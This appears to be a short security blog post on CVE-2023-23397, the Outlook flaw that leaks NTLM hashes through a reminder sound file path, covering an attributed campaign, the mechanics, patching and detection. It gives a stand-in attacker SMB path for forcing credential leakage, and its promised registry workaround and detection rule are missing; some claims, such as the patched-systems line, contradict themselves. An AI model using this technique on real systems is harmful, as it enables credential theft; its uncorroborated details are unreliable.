Real-World Context: Why Critical Infrastructure Became Ground Zero

APT29, widely attributed to Russia's SVR, has a long history of targeting government and critical infrastructure. In early 2023, they leveraged CVE-2023-23397 to compromise organizations in the energy and transportation sectors across Europe. The vulnerability allowed attackers to force an Outlook client to authenticate to an attacker-controlled SMB share, leaking NTLM credentials without user interaction. According to Mandiant, this campaign hit at least 15 entities, with some breaches persisting for months before detection.

Why critical infrastructure? These sectors often run legacy systems with limited patch cycles. The exploit required only a crafted email arriving in the victim's inbox—no phishing click, no macro enable. This made it a perfect vector for stealthy initial access.

Technical Breakdown of CVE-2023-23397

Vulnerability Mechanics

CVE-2023-23397 resides in the way Outlook processes reminder sound file paths. When a meeting request or task with a custom sound file path (via the PidLidReminderFileParameter property) is opened, Outlook automatically connects to the specified path. If that path points to an attacker's SMB share (\\\\attacker_ip\\malicious.wav), the Windows OS sends the user's NTLM hash as part of the authentication handshake. No user interaction beyond opening the email is required.

In our pentests, we've replicated this with a simple Python script using the pypff library to modify the PidLidReminderFileParameter property. The exploit works on fully patched systems as long as Outlook hasn't received the March 2023 security update.

Proactive Hardening

First, apply the March 2023 Outlook security patch immediately. For unpatched systems, implement the following registry workaround to block SMB outbound from Outlook:

This disables NTLM authentication for outbound connections, but test thoroughly as it may break legacy apps.

Detection Rules

Your SOC should monitor for SMB outbound connections from Outlook.exe. Here's a Sigma rule for Windows Event Log ID 4624 (successful logon) with a suspicious target:
